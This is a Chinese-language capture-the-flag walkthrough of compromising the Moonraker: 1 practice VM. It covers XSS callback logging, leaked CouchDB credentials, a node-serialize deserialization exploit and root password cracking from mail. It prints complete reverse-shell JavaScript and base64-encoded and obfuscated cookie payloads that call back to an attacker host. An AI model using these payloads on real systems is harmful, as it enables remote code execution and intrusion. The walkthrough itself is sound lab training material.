Moonraker:1靶機入侵

 

 0x01 前言

攻擊Moonraker系統而且找出存在最大的威脅漏洞,經過最大威脅漏洞攻擊目標靶機系統並進行提權獲取系統中root目錄下的flag信息。php

Moonraker: 1鏡像下載地址:html

http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmAnode

0x02 信息收集python

1.存活主機掃描nginx

root@kali2018:/# arp-scan -l

發現192.168.1.10是目標靶機系統git

2.端口掃描shell

namp掃描目標靶機端口數據庫

root@kali2018:~# nmap -p  - -A  192.168.1.10  --open

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 16:21 EST

Nmap scan report for 192.168.1.10

Host is up (0.00077s latency).

Not shown: 65529 closed ports

PORT      STATE SERVICE  VERSION

22/tcp    open  sshOpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)

| ssh-hostkey:

|   2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA)

|   256 53:59:87:1e:a4:46:bd:a7:fd:9a:5f:f9:b7:40:9d:2f (ECDSA)

|_  256 0d:88:d9:fa:af:08:ce:2b:13:66:a7:70:ec:49:02:10 (ED25519)

80/tcp    open  httpApache httpd 2.4.25 ((Debian))

| http-robots.txt: 1 disallowed entry

|_/

|_http-server-header: Apache/2.4.25 (Debian)

|_http-title: MOONRAKER

3000/tcp  open  httpNode.js Express framework

| http-auth:

| HTTP/1.1 401 Unauthorized\x0D

|_  Basic realm=401

|_http-title: Site doesn't have a title (text/html; charset=utf-8).

4369/tcp  open  epmdErlang Port Mapper Daemon

| epmd-info:

|   epmd_port: 4369

|   nodes:

|_    couchdb: 33681

5984/tcp  open  couchdb?

| fingerprint-strings:

|   FourOhFourRequest:

|     HTTP/1.0 404 Object Not Found

|     Cache-Control: must-revalidate

|     Connection: close

|     Content-Length: 58

|     Content-Type: application/json

|     Date: Mon, 11 Feb 2019 21:22:55 GMT

|     Server: CouchDB/2.2.0 (Erlang OTP/19)

|     X-Couch-Request-ID: bf092a958f

|     X-CouchDB-Body-Time: 0

|     {"error":"not_found","reason":"Database does not exist."}

|   GetRequest:

|     HTTP/1.0 200 OK

|     Cache-Control: must-revalidate

|     Connection: close

|     Content-Length: 164

|     Content-Type: application/json

|     Date: Mon, 11 Feb 2019 21:22:02 GMT

|     Server: CouchDB/2.2.0 (Erlang OTP/19)

|     X-Couch-Request-ID: f038a56575

|     X-CouchDB-Body-Time: 0

|{"couchdb":"Welcome","version":"2.2.0","git_sha":"2a16ec4","features":["pluggable-storage-engines","scheduler"],"vendor":{"name":"The Apache Software Foundation"}}

|   HTTPOptions:

|     HTTP/1.0 500 Internal Server Error

|     Cache-Control: must-revalidate

|     Connection: close

|     Content-Length: 61

|     Content-Type: application/json

|     Date: Mon, 11 Feb 2019 21:22:02 GMT

|     Server: CouchDB/2.2.0 (Erlang OTP/19)

|     X-Couch-Request-ID: fdeb1a3860

|     X-Couch-Stack-Hash: 1828508689

|     X-CouchDB-Body-Time: 0

|_{"error":"unknown_error","reason":"badarg","ref":1828508689}

NMAP掃描輸出顯示開放端口服務:22ssh),80http),110pop3),3000node.js),4369epmd,5984couchdbexpress

3.目錄掃描apache

我比較喜歡gobusterDirBuster來進行目錄掃描,這裏我用gobuster進行目標目錄掃描。

在掃描完成後,發現一個可疑的目錄爲/services

打開該目錄的連接地址http://192.168.1.10/services/,能夠在網頁底部看到SEND AN INIRIRY的超級連接,而後打開超連接。

打開連接後顯示了一個售後聯繫信息頁面。注意到有人會查詢咱們提交的信息,並會在5分鐘內與咱們聯繫。

這裏咱們使用<img>標籤嵌套了個人遠程服務網站地址。(只要對方訪問了該嵌套xss,遠端服務器的日誌就會被記錄訪問請求日誌記錄)

apache啓動

在提交信息前,啓動apache服務,並在/var/www/html目錄下新建一個測試文件test.txt,內容隨便寫一個。

root@kali2018:~# /etc/init.d/apache2 start

[ ok ] Starting apache2 (via systemctl): apache2.service.

root@kali2018:~# cd /var/www

root@kali2018:/var/www# ls

html

root@kali2018:/var/www# cd html/

root@kali2018:/var/www/html# ls

index.html  index.nginx-debian.html

root@kali2018:/var/www/html# vi  test.txt

root@kali2018:/var/www/html#

測試apache服務器能正常訪問

隨後能夠經過apache2 access.log能夠查看到訪問目標靶機網站日誌記錄。點擊提交後,它已顯示感謝您的提交消息,以下圖所示。

經過命令查看apache訪問日誌

tail -f /var/log/apache2/access.log

能夠發現日誌中有一個有趣的http refefer地址:http://192.168.1.10/svc-inq/salesmoon-gui.php

0x03 漏洞利用

1.CouchDB信息收集

咱們在瀏覽器中打開http refefer請求地址

而後顯示出"返回銷售管理後臺"的超連接,點擊可進入到銷售後臺管理登陸頁面。

接下來咱們點擊CouchDB Notes並獲得一些關於用戶名的密碼的提示:

用戶名:jaws ,密碼:jaws女朋友名字+ x99  

在這裏,咱們谷歌搜索Jaws' girlfriend

 

已獲取到Fauxton系統中Apache CouchDB的用戶名和密碼。要了解有關FauxtonCouchDB的更多信息,咱們能夠經過googel搜索它們的使用方法(http://docs.couchdb.org/en/stable/fauxton/install.html).

2.CouchDB登陸及信息泄露

 因爲端口5984是開放的。能夠打開CouchDB登陸頁面(192.168.1.10:5984/_utils/).

 這裏咱們使用了Login Credentials,以下所示:

Username: jaws

Password: dollyx99

 

已成功登陸,如今讓咱們查看這3個數據庫中的信息。

links數據庫暴露出更多的信息

查看該連接數據庫中的文檔,由於每一個文檔都包含目錄連接,但第三個目錄連接可能會爲咱們的下一步滲透提供有用的信息。

所以,咱們打開第三個文檔的鏈接,並查看到有用的鏈接目錄信息。

因此上面的連接,在打開後顯示出一我的事辦公備忘記錄的信息(這裏記錄幾我的的重要郵件信息)

能夠看到郵件中泄露了用戶名和密碼

3.Node.js反序列化

這裏打開http://192.168.1.10/raker-sales/後臺管理頁面,發現「hugo's page moved to port 3k」頁面是有趣的(結合上面人事備忘記錄頁面中的hugo郵件信息)

打開該連接後,可看到有關node.js服務器和訪問的信息

 

 

用戶名和密碼在HugoHR郵件中http://192.168.1.10/HR-Confidential/offer-letters.html

顯示出登陸node.js的用戶名和密碼(經過3000端口訪問)

 

登陸後,node.js服務器會發送「Set-Cookie」信息。

febf16dc.png

Node.js反序列化漏洞相關信息能夠參考該連接地址。

4.反序化漏洞利用

NMAP Scan輸出,咱們知道端口3000Node.js框架應用。所以,咱們在瀏覽器上打開目標IP3000端口應用並彈出登陸用戶界面。

Username: hugo

Password: TempleLasersL2K

成功登陸後,咱們會在頁面中顯示一條消息。這個頁面彷佛毫無用處,但在花時間搞清楚下一步該作什麼後,它變得很是有趣。

啓動F12查看頁面的請求信息。在Cookie中看到了base64編碼信息。這裏咱們將以base64編碼形式插入node.js反序列化漏洞。

 

使用msfvenom生成nodejs反彈shell

 msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.21  LPORT=1234

從終端輸出msfvenomrce.js

rce.js

var rev = {

rce: function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("net"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, "192.168.1.21", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }

};

var serialize = require('node-serialize');

console.log(serialize.serialize(rev));

 

運行node rce.js以獲取序列化字符串輸出。

root@kali2018:/opt# node  rce.js

{"rce":"_$$ND_FUNC$$_function (){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, \"192.168.1.21\", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === \"undefined\") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on(\"error\", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }"}

接下來,將IIFE括號()添加到上一步的序列化字符串輸出的末尾

{"rce":"_$$ND_FUNC$$_function (){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, \"192.168.1.21\", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === \"undefined\") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on(\"error\", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }()"}

而後將其轉換成base64編碼

eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7IHZhciByZXF1aXJlID0gZ2xvYmFsLnJlcXVpcmUgfHwgZ2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZDsgaWYgKCFyZXF1aXJlKSByZXR1cm47IHZhciBjbWQgPSAoZ2xvYmFsLnByb2Nlc3MucGxhdGZvcm0ubWF0Y2goL153aW4vaSkpID8gXCJjbWRcIiA6IFwiL2Jpbi9zaFwiOyB2YXIgbmV0ID0gcmVxdWlyZShcIm5ldFwiKSwgY3AgPSByZXF1aXJlKFwiY2hpbGRfcHJvY2Vzc1wiKSwgdXRpbCA9IHJlcXVpcmUoXCJ1dGlsXCIpLCBzaCA9IGNwLnNwYXduKGNtZCwgW10pOyB2YXIgY2xpZW50ID0gdGhpczsgdmFyIGNvdW50ZXI9MDsgZnVuY3Rpb24gU3RhZ2VyUmVwZWF0KCl7IGNsaWVudC5zb2NrZXQgPSBuZXQuY29ubmVjdCgxMjM0LCBcIjE5Mi4xNjguMS4yMVwiLCBmdW5jdGlvbigpIHsgY2xpZW50LnNvY2tldC5waXBlKHNoLnN0ZGluKTsgaWYgKHR5cGVvZiB1dGlsLnB1bXAgPT09IFwidW5kZWZpbmVkXCIpIHsgc2guc3Rkb3V0LnBpcGUoY2xpZW50LnNvY2tldCk7IHNoLnN0ZGVyci5waXBlKGNsaWVudC5zb2NrZXQpOyB9IGVsc2UgeyB1dGlsLnB1bXAoc2guc3Rkb3V0LCBjbGllbnQuc29ja2V0KTsgdXRpbC5wdW1wKHNoLnN0ZGVyciwgY2xpZW50LnNvY2tldCk7IH0gfSk7IHNvY2tldC5vbihcImVycm9yXCIsIGZ1bmN0aW9uKGVycm9yKSB7IGNvdW50ZXIrKzsgaWYoY291bnRlcjw9IDEwKXsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgU3RhZ2VyUmVwZWF0KCk7fSwgNSoxMDAwKTsgfSBlbHNlIHByb2Nlc3MuZXhpdCgpOyB9KTsgfSBTdGFnZXJSZXBlYXQoKTsgfSgpIn0=

 

先登陸node.js後臺,而後再刷新頁面,經過bupsuit進行攔截,將整個base64字符串設置爲cookieprofile的值,替換完profile值後進行攔截提交,在者以前,您須要設置您的nc偵聽。

如今,咱們在攻擊機上監聽netcat,而後經過python腳本進入交互shell界面:python -c 'import pty; pty.spawn("/bin/bash")'

root@kali2018:/opt# nc -lvvp 1234

listening on [any] 1234 ...

192.168.1.10: inverse host lookup failed: Unknown host

connect to [192.168.1.21] from (UNKNOWN) [192.168.1.10] 46010

id

uid=1001(jaws) gid=1001(jaws) groups=1001(jaws)

python -c "import pty;pty.spawn('/bin/bash')"

jaws@moonraker:/$

0x04 權限提高

在枚舉jaws賬戶期間,我注意到Postfix正在本地監聽25端口。

netstat  -ano

咱們進入目錄/var/mial中發現了四個郵箱帳號信息,但沒有權限訪問它們。

jaws@moonraker:~$ cd  /var/mai

jaws@moonraker:/var/mail$ ls -al

total 96

drwxrwsr-x  2 root          mail4096 Oct 14 10:25 .

drwxr-xr-x 12 root          root  4096 Sep 20 17:38 ..

-rw-------  1 hugo          mail2994 Oct  6 11:47 hugo

-rw-------  1 moonrakertech mail  1478 Oct5 19:24 moonrakertech

-rw-------  1 root          mail 68975 Oct  6 11:40 root

-rw-------  1 sales         mail6342 Oct 14 10:25 sales

在瞭解了CouchDb的配置以後,咱們發現CouchDb的默認安裝目錄是/opt/couchdb,從/etc/local.ini讀取配置文件。

讓咱們查看local.ini中的配置內容

jaws@moonraker:/var/mail$tail /opt/couchdb/etc/local.ini

 

Username: hugo

Password: 321Blast0ff!!

eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDExOCw5NywxMTQsMzIsMTEwLDEwMSwxMTYsMzIsNjEsMzIsMTE0LDEwMSwxMTMsMTE3LDEwNSwxMTQsMTAxLDQwLDM5LDExMCwxMDEsMTE2LDM5LDQxLDU5LDEwLDExOCw5NywxMTQsMzIsMTE1LDExMiw5NywxMTksMTEwLDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEsNDYsMTE1LDExMiw5NywxMTksMTEwLDU5LDEwLDcyLDc5LDgzLDg0LDYxLDM0LDQ5LDUwLDU1LDQ2LDQ4LDQ2LDQ4LDQ2LDQ5LDM0LDU5LDEwLDgwLDc5LDgyLDg0LDYxLDM0LDUwLDUxLDUxLDUxLDM0LDU5LDEwLDg0LDczLDc3LDY5LDc5LDg1LDg0LDYxLDM0LDUzLDQ4LDQ4LDQ4LDM0LDU5LDEwLDEwNSwxMDIsMzIsNDAsMTE2LDEyMSwxMTIsMTAxLDExMSwxMDIsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSw2MSw2MSwzMiwzOSwxMTcsMTEwLDEwMCwxMDEsMTAyLDEwNSwxMTAsMTAxLDEwMCwzOSw0MSwzMiwxMjMsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSwzMiwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsMTA1LDExNiw0MSwzMiwxMjMsMzIsMTE0LDEwMSwxMTYsMTE3LDExNCwxMTAsMzIsMTE2LDEwNCwxMDUsMTE1LDQ2LDEwNSwxMTAsMTAwLDEwMSwxMjAsNzksMTAyLDQwLDEwNSwxMTYsNDEsMzIsMzMsNjEsMzIsNDUsNDksNTksMzIsMTI1LDU5LDMyLDEyNSwxMCwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsMzIsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDExOCw5NywxMTQsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiwzMiw2MSwzMiwxMTAsMTAxLDExOSwzMiwxMTAsMTAxLDExNiw0Niw4MywxMTEsOTksMTA3LDEwMSwxMTYsNDAsNDEsNTksMTAsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0Niw5OSwxMTEsMTEwLDExMCwxMDEsOTksMTE2LDQwLDgwLDc5LDgyLDg0LDQ0LDMyLDcyLDc5LDgzLDg0LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMTUsMTA0LDMyLDYxLDMyLDExNSwxMTIsOTcsMTE5LDExMCw0MCwzOSw0Nyw5OCwxMDUsMTEwLDQ3LDExNSwxMDQsMzksNDQsOTEsOTMsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTksMTE0LDEwNSwxMTYsMTAxLDQwLDM0LDY3LDExMSwxMTAsMTEwLDEwMSw5OSwxMTYsMTAxLDEwMCwzMyw5MiwxMTAsMzQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTIsMTA1LDExMiwxMDEsNDAsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDUsMTEwLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDQsNDYsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDEsMTE0LDExNCw0NiwxMTIsMTA1LDExMiwxMDEsNDAsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0LDQ2LDExMSwxMTAsNDAsMzksMTAxLDEyMCwxMDUsMTE2LDM5LDQ0LDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw5OSwxMTEsMTAwLDEwMSw0NCwxMTUsMTA1LDEwMywxMTAsOTcsMTA4LDQxLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDEwMSwxMTAsMTAwLDQwLDM0LDY4LDEwNSwxMTUsOTksMTExLDExMCwxMTAsMTAxLDk5LDExNiwxMDEsMTAwLDMzLDkyLDExMCwzNCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMjUsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTExLDExMCw0MCwzOSwxMDEsMTE0LDExNCwxMTEsMTE0LDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwxMDEsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDEsMTE2LDg0LDEwNSwxMDksMTAxLDExMSwxMTcsMTE2LDQwLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDQ0LDMyLDg0LDczLDc3LDY5LDc5LDg1LDg0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwxMjUsMTAsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsNTksMTApKX0oKSJ9Cg==

有了hugo密碼,我登陸他的賬戶並閱讀他的郵件。

jaws@moonraker:/var/mail$ su  hugo

Password: 321Blast0ff!

Mail version 8.1.2 01/15/2001.  Type ? for help.

登陸hugo用戶後,而後讀取了其郵件信息,咱們注意到Message 2頗有趣,由於它包含root和哈希密碼,而且還告訴咱們該密碼也在VROOM系統中使用。

jaws@moonraker:/var/mail$ mail

"/var/mail/hugo": 3 messages 3 new

>N  1 moonrakertech@moo  Fri Oct5 19:11   17/842   RE:Root Access

 N2 moonrakertech@moo  Fri Oct  5 19:3923/1351  RE:RE:RE:Root Access

 N3 hr@moonraker.loca  Fri Oct  5 20:2417/801   Decompression Accident

&

這裏咱們讀取郵件2的信息

>N  1 moonrakertech@moo  Fri Oct5 19:11   17/842   RE:Root Access

 N2 moonrakertech@moo  Fri Oct  5 19:3923/1351  RE:RE:RE:Root Access

 N3 hr@moonraker.loca  Fri Oct  5 20:2417/801   Decompression Accident

& 2

Message 2:

From moonrakertech@moonraker.localdomainFri Oct  5 19:39:51 2018

X-Original-To: hugo@moonraker.localdomain

To: hugo@moonraker.localdomain

Subject: RE:RE:RE:Root Access

MIME-Version: 1.0

Content-Type: text/plain; charset="UTF-8"

Content-Transfer-Encoding: 8bit

Date: Fri,  5 Oct 2018 19:39:51 -0400 (EDT)

From: moonrakertech@moonraker.localdomain

Hugo...I'm being given a reward huh? Finally some well deserved recognition! Also this better come with a bump in pay otherwise I'm not afraid to give you a piece of my mind! See you outside of the Decompression Chamber shortly as per your request...I'm expecting the Award to be in hand as I don't like to get up from me desk.

Also your ticket has been complete. Since I'm feeling nice today, I'm including the password here in its native hash and not in the ticket. BTW this is the old password hash, the new one is the same + "VR00M" without quotes.

Have fun with the decryption process "Boss"! Haha!

 

root:$6$auLf9y8f$qgi63MGYQGnnk6.6ktcZIMpROPMqMXMEM7JufH1aTIApIPIZZu7yRjfIcZ1pELNoeMM7sIwCrVmMCjNYJRRGf/:17809:0:99999:7:::

這裏顯示了root以及對應舊密碼的hash

讓咱們複製舊密碼哈希並經過John the Ripper進行離線破解

john  root.hash

Username: root

Password: cyber

最終新的登陸密碼爲:cyber+VR00M(cyberVR00M)

使用root身份登陸系統。

su root

Password: cyberVR00M

hugo@moonraker:/var/mail$ su root

Password: cyberVR00M

0X05 flag信息查看

成功以root身份登陸,在檢查其郵件目錄時,咱們找到了flag.txt文件。

root@moonraker:~# cd /root

root@moonraker:~# ls

coreDesktop  Downloads  flag.txt

root@moonraker:~# cat flag.txt

3d059e8e.png

相關文章
相關標籤/搜索